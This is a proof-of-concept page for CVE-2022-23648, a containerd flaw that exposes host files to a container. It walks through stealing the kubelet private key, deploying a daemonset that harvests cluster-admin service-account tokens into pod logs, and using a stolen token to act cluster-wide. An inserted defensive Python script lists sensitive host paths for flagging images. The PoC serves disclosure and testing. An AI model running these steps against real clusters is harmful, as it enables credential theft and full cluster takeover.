
CVE-2022-23648 PoC — containerd information disclosure vulnerability

Associated Vulnerability
Title: containerd information disclosure vulnerability (CVE-2022-23648)
Description: containerd is a container daemon from the US Apache Foundation. Following the RunC OCI specification, the daemon controls the full lifecycle of containers on the host. containerd versions before 1.6.1, before 1.5.10, and before 1.14.12 contain an information disclosure vulnerability: an attacker can start a container with a specially crafted image configuration and obtain read-only copies of arbitrary files and directories on the host. This can bypass any policy-based enforcement of container settings (including Kubernetes Pod Security Policies) and expose potentially sensitive information.
Description: POC for CVE-2022-23648
Readme
## PoC for CVE-2022-23648

This is a proof of concept for [@_fel1x](https://twitter.com/_fel1x)'s CVE-2022-23648. Disclosure info [here](https://bugs.chromium.org/p/project-zero/issues/detail?id=2244), CVE info [here](https://github.com/containerd/containerd/security/advisories/GHSA-crp2-qrr5-8pq7) and a blog with some more information and mitigation ideas [here](https://blog.aquasec.com/cve-2022-23648-containerd-cri-plugin). The `Containerfile` has the info needed, and you can change the target of the VOLUME to try out different paths.

The easiest way to show it working is to use [KinD](https://kind.sigs.k8s.io/docs/user/quick-start/), which ships node images that are exploitable.

## Basic Test procedure

Unless the node somehow has a lot of data in `/var/lib/kubelet/pki`, this should be a safe test.

- `kind create cluster --image=kindest/node:v1.21.1`
- `kubectl create -f pod-manifest.yaml`
- `kubectl exec poctest -- ls /var/lib/kubelet/pki/`

And if you get back files including `kubelet.key` it worked :)
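A defender-side check, added here and not part of the PoC repository: it audits the `Volumes` declared in an image config (what a `VOLUME` line in the `Containerfile` produces) against a list of sensitive host prefixes, so an image scanner or admission hook can flag images built this way before they reach a not-yet-patched node. The prefix list, the sample config and the function names are assumptions, not from the project.

```python
"""Flag image configs whose declared volumes sit under sensitive host paths.

Added example for the CVE-2022-23648 README; it is not part of the PoC.
Input is the OCI image config JSON (or `docker image inspect` output),
where the `config`/`Config` section carries a `Volumes` map of
container paths to empty objects.
"""
import json
import posixpath

# Assumed list of host prefixes a vulnerable containerd could mirror
# into a container; the first is the path the PoC's Containerfile uses.
SENSITIVE_PREFIXES = (
    "/var/lib/kubelet",
    "/etc/kubernetes",
    "/root",
    "/etc/shadow",
    "/var/run/secrets",
)


def normalize(path):
    """Collapse '..' and repeated slashes so '/etc/../root' is seen as '/root'."""
    return posixpath.normpath("/" + path.lstrip("/"))


def is_sensitive(path):
    """True if the normalized path equals or lies below a sensitive prefix."""
    p = normalize(path)
    return any(p == s or p.startswith(s + "/") for s in SENSITIVE_PREFIXES)


def flag_volumes(image_config):
    """Return the sorted volume paths in an image config that are sensitive."""
    cfg = image_config.get("config") or image_config.get("Config") or {}
    volumes = cfg.get("Volumes") or {}
    return sorted(v for v in volumes if is_sensitive(v))


# Constructed sample config: an image whose Containerfile declared three
# VOLUMEs, one of them the PoC's target and one obfuscated with '..'.
SAMPLE_CONFIG = json.loads("""{
  "architecture": "amd64",
  "config": {
    "Volumes": {"/var/lib/kubelet/pki": {}, "/data": {}, "/etc/../root/.ssh": {}}
  }
}""")

if __name__ == "__main__":
    for volume in flag_volumes(SAMPLE_CONFIG):
        print("suspicious VOLUME:", volume)
```

Run it against the output of `docker image inspect` or the `config` blob of any OCI image to get a list of volumes worth rejecting.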

## Try to escalate to cluster-admin

NOTE: **Do not attempt this on a production cluster.  A vulnerable Containerd may duplicate a lot of data into this attack pod and exhaust disk space. Also, this will print cluster-admin SA tokens to pod logs which are likely to get sent to a logging destination in plaintext**

This will run a daemonset that attempts to enumerate all Kubernetes service account tokens on the node and prints any token found to be a `cluster-admin` token to the pod's logs.

- `kubectl apply -f ds.yaml`
- `kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i '*' '*' -A`

If `yes` is printed, congrats, you have a short-lived `cluster-admin` service account token. Run:

- `kubectl logs -l app=poctest | head -1 | awk -F\. '{print $2}' | base64 -d` to see which SA it is
- `kubectl --token="$(kubectl logs -l app=poctest | head -1)" get pods -A`
- `kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i --list`

## Author

- [Rory McCune @raesene](https://twitter.com/raesene)

## Contributors

- [@BradGeesaman](https://twitter.com/bradgeesaman) - Escalation Daemonset
File Snapshot

[4.0K] /data/pocs/8360b0a14fbec8e9c8ab520e4f326cc5356886b4
├── [ 117] Containerfile
├── [1.2K] ds.yaml
├── [ 233] pod-manifest.yaml
└── [2.1K] README.md

0 directories, 4 files